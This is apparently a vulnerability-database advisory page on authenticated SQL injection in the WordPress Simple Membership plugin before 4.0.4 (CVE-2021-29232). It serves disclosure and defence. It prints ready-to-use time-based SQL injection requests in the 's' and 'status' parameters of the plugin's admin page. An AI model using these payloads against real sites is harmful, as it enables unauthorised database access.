Lucene search
Simple Membership < 4.0.4 - Authenticated SQL Injections
Simple Membership < 4.0.4 - Authenticated SQL Injections in GET Reques
Show more
| Reporter | Title | Published | Views | Family All 3 |
|---|---|---|---|---|
 | CVE-2021-29232 | 20 Apr 202219:48 | – | cve |
 | Simple Membership < 4.0.4 - Authenticated SQL Injections | 5 Apr 202100:00 | – | wpvulndb |
 | WordPress Simple Membership plugin <= 4.0.3 - Authenticated SQL Injection (SQLi) vulnerability | 5 Apr 202100:00 | – | patchstack |
| Source | Link |
|---|---|
| trustwave | www.trustwave.com/en-us/resources/security-resources/security-advisories/ |
GET /wp/wp-admin/admin.php?status=&membership_level=&s=hhhh%27%20OR%20SLEEP%281%29%20OR%20first_name%20LIKE%20%27%25i%0A&page=simple_wp_membership HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp/wp-admin/admin.php?page=simple_wp_membership
Connection: keep-alive
Cookie: [admin cookies]
Upgrade-Insecure-Requests: 1
In addition to the 's' parameter, the 'status' parameter is similarly vulnerable:
GET /wp/wp-admin/admin.php?status=active%27%20AND%20SLEEP%288%29%20AND%20%27a%27%3D%27a&membership_level=&s=&page=simple_wp_membership
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo05 Apr 2021 00:00Current
1Low risk
Vulners AI Score1